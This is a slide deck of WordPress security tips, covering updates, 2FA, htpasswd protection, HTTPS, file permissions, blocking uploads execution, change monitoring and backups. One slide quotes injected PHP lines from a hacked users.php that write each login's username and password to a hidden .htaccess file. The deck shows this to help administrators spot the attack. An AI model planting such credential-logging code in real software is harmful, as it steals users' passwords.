Security
Tips & Tricks in securing your WordPressinstallation
About Me
• WordPress Plugins Developer
– Since 2003
– Created > 22 plugins
• wp-pagenavi, wp-polls, wp-postratings, wp-postviews, wp-dbmanager, etc
• http://profiles.wordpress.org/gamerz
• Tech Guy in Tech in Asia
– Joined on 1st September 2014
Lester Chan (@gamerz) [ 2 ]
WordPress Is Popular
• Power 22% of the web
• Most blogs uses WordPress
– Mashable.com
– Techcrunch.com
• Because it is popular, lots of attacks are being targeted at WordPress sites
Lester Chan (@gamerz) [ 3 ]
Hack Attempts
• wp-includes/users.php
– $fh = fopen(ABSPATH . "core/wp-content/plugins/.htaccess","a+");
– fwrite($fh,$credentials['user_login'] . ':' . $credentials['user_password'] . "\n");
– fclose($fh);
• Backdoor files
Lester Chan (@gamerz) [ 4 ]
Security 101
• Always keep your WordPress & it’s plugins up to date.– 20th November 2014
• WordPress 4.0.1 was released to fix:– Three cross-site scripting issues that a contributor or author
could use to compromise a site.
– A cross-site request forgery that could be used to trick a user into changing their password.
– An issue that could lead to a denial of service when passwords are checked
– An extremely unlikely hash collision could allow a user’s account to be compromised
Lester Chan (@gamerz) [ 5 ]
Passwords
• Use a complex password– In general
• Not just WordPress but your CPanel/FTP as well
• Use a 2FA plugin– Google Authenticator
• https://wordpress.org/plugins/google-authenticator/
– Authy Two Factor Authentication• https://wordpress.org/plugins/authy-
two-factor-authentication/
Lester Chan (@gamerz) [ 6 ]
Passwords
• Protect your WP-Admin with a password
– Using htpasswd
• http://www.htaccesstools.com/htpasswd-generator/
– Placing .htaccess in wp-adminErrorDocument 401 default
AuthName "Lester Chan's Website WordPress Admin"
AuthUserFile "/home/gamerz/wp-admin/passwd"
AuthType Basic
require valid-user
<Files admin-ajax.php>
Order allow,deny
Allow from all
Satisfy any
</Files>
Lester Chan (@gamerz) [ 7 ]
HTTPS
• HTTPS encrypts communication and sensitive data between the browser and wp-admin.
• Prevents man in the middle attacks.
– define('FORCE_SSL_LOGIN', true);
– define('FORCE_SSL_ADMIN', true);
Lester Chan (@gamerz) [ 8 ]
Files/Folder Permissions
• Files & folder should be only readable & writeable only by the owner and readable by the rest
• Ensure all files are CHMOD to 644
– find . -type f -exec chmod 644 {} \;
• Ensure all folders are CHMOD to 755
– find . -type d -exec chmod 755 {} \;
Lester Chan (@gamerz) [ 9 ]
WordPress Uploads
• /wp-content/uploads/– Is a common vector for attacks because it store
user uploaded files
– Harder to notice
– Most people will just CHMOD this to 777• Which means everyone can read & write to it
– This folder should only serve static assets & not execute any scripts• http://stackoverflow.com/questions/18932756/disable-
all-cgi-php-perl-for-a-directory-using-htaccess
Lester Chan (@gamerz) [ 10 ]
Monitor Changed Files
• I monitor my site changed files via email on a daily basis
• Using CRON
– find /home/gamerz/public_html -mtime -1
Lester Chan (@gamerz) [ 11 ]
Using Git
• /core/– Contains a Git checkout of
https://github.com/WordPress/WordPress
– git fetch --tags; git checkout 4.0.1
• /content/– It is a Git checkout of my private repository
– Contains all my active plugins and themes
• Doing a git status on any folder above will also tell me what has changed
Lester Chan (@gamerz) [ 12 ]
Backup
• Backup your database regularly– Every hour if you blog more than once a day
– Every day if you blog regularly
– Using a plugin like WP-DBManager• https://wordpress.org/plugins/wp-dbmanager/
• Backup your /uploads/ folder– Using Git? (not ideal)
– FTP to S3/Dropbox?
– NAS
– Gluster FS
Lester Chan (@gamerz) [ 13 ]
VaultPress
• https://vaultpress.com/– By Automattic
• Company behind WordPress.com
– Paid• Lite (USD$55/year), Basic (USD$165/year), Premium
(USD$440/year)
– Features• Realtime full (database + files) backup
• Scanning your site for dangerous files
• Automatic restore of database + files
Lester Chan (@gamerz) [ 14 ]
WordFence
• http://www.wordfence.com/
• By Feedjit Inc– Paid
• USD$39/year
– Features• Cellphone Sign-in
• Network & Geo Blocking
• Site Repair
• Machine Learning
• Source Code Verification
Lester Chan (@gamerz) [ 15 ]
Summary
• Password Protected WP-Admin• Use Google Authenticator as 2FA login for
WordPress• HTTPS for WP-Admin• Ensure all file are CHMOD to 644 and folders to
755• Do not allow any script execution in /uploads/
folder• Monitor your site changed files • Backup your database regularly
Lester Chan (@gamerz) [ 16 ]
Other References
• http://codex.wordpress.org/Hardening_WordPress
• http://codex.wordpress.org/Backing_Up_Your_WordPress_Files
• http://wordpress.tv/tag/security/
Lester Chan (@gamerz) [ 17 ]
Questions?
• Any questions?
• You can also find me at
– Blog: http://lesterchan.net
– Twitter: @gamerz
– Facebook: https://fb.com/lesterchan
– Instagram: @gamerz
Lester Chan (@gamerz) [ 18 ]
Top Related